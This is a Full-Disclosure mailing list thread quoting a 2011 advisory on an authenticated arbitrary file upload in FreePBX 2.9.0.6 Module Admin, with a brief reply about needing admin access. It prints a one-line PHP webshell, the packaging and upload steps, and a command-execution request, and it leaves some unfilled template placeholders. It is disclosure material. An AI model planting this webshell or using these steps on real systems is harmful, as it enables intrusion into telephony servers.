unfortunately need administrative access On Thu, Jun 9, 2011 at 5:11 PM, Tyler Borland <[email protected]> wrote:
> So you need administrative access to upload the file? > > On Thu, Jun 9, 2011 at 7:24 AM, Tiago Ferreira <[email protected]>wrote: > >> ====[ Alligator Security Team >> ]=============================================== >> >> FreePBX - Module Administration Arbitrary File Upload >> >> Members: Tiago Ferreira < tiago SPAM alligatorteam.org > >> >> ====[ Table of Contents >> ]===================================================== >> >> 1. Overview >> 2. Detailed description >> 3. Other Contexts & Solutions >> 4. Thanks >> 5. References >> >> ====[ Overview >> ]============================================================== >> >> * Systems affected: FreePBX >> * Version: 2.9.0.6 (other versions may be affected) >> * Release date: [Example Date] >> * Impact: Remote command execution >> >> "FreePBX is an easy to use GUI (graphical user interface) that controls >> and >> manages Asterisk, the world's most popular open source telephony engine >> software. FreePBX has been developed and hardened by thousands of >> volunteers >> over tens of thousands man hours. FreePBX has been downloaded over >> 5,000,000 >> times and estimates over 500,000 active phone systems."[1] >> >> The functionality Module Admin, available for authenticated users within >> the administrative interface of FreePBX, is prone to a vulnerability which >> enables an attacker to upload malicious PHP files, and thus, perform >> remote >> arbitrary code execution within the context of a web server user." >> >> ====[ Detailed description >> ]================================================== >> >> In order to exploit this vulnerability and execute remote commands on a >> vulnerable FreePBX instance, access to Module Admin (Admin > Setup > >> Module >> Admin or, Tools > Setup > Module Admin) is needed. This can be aquired by >> following the given steps: >> >> 1. Create a directory like: webshell >> 2. Get a PHP file web trojan (webshell.php) >> >> Ex.: <? if($_GET['cmd']) { system($_GET['cmd']); }?> >> >> 3. Put this file into the webshell directory and create a tarball. This >> zip >> file name needs to follow the given rule: name-version.[tar|tar.gz|tgz], >> to >> our webshell we will do this: tar -czvf webshell-1.0.tar.gz webshell/. >> >> 4. On the upload form, browse to the file wbshell-1.0.tar.gz and send it. >> >> When the file is uploaded with success, the path for accessing the trojan >> will be: /admin/modules/webshell/webshell.php. >> >> Now, the possibility for executing remote system commands is possible >> using >> the uploaded trojan. >> >> Ex: http://127.0.0.1/admin/modules/webshell/webshell.php?cmd=whoami >> >> ====[ Other Contexts & Solutions >> ]============================================ >> >> Description of a possible use case of the mentioned vulnerability. >> >> Ex (DoS): A potential attacker could take advantage of this issue to >> disable >> the services provided by [software/device] for as long as the attacks >> occurs. >> >> ====[ Thanks/Acknowledgements >> ]=============================================== >> >> - Joaquim Brasil < joaquim SPAM alligatorteam.org > >> >> >> ====[ References >> ]============================================================ >> >> - [1] http://www.freepbx.org/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
